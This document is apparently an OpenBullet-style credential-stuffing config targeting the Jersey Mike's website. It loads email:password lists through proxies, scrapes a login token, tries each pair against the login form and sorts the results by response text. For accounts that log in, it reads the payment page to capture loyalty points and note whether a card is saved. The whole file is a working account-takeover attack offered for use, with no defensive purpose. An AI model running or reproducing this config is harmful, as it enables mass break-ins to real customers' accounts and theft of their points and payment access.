[SETTINGS]
{
  "Name": "JerseyMikes",
  "SuggestedBots": 100,
  "LastModified": "2018-06-07T03:42:41.3948214+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#REQUEST_PAGE REQUEST GET "https://www.jerseymikes.com" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_TOKEN PARSE "<SOURCE>" LR "token\" type=\"hidden\" value=\"" "\">" Recursive=FALSE -> VAR "TOKEN" "" "" 
#REQUEST_LOGIN_(POST) REQUEST POST "https://www.jerseymikes.com/account/login" AutoRedirect=TRUE 
  CONTENT "_token=<TOKEN>&email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.jerseymikes.com/account" 
  HEADER "Origin: https://www.jerseymikes.com" 
#FAIL_CHECK KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Retry OR 
    KEY "There are some problems" 
  KEYCHAIN Success OR 
    KEY "</i> <span class=\"hide-sm\">Basic </span>Info</a>" 
  KEYCHAIN Failure OR 
    KEY "Your email and password do not match any account for this country." 
#REQUEST_CARD_PAGE REQUEST GET "https://www.jerseymikes.com/account/payment" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_POINTS PARSE "<SOURCE>" LR "																	<div><strong>" "</strong></div>" Recursive=FALSE -> CAP "Points" "" "" 
#NO_CC PARSE "<SOURCE>" LR "					<td colspan=\"4\">" "</td>" Recursive=FALSE -> CAP "No CC :True" "" "" 
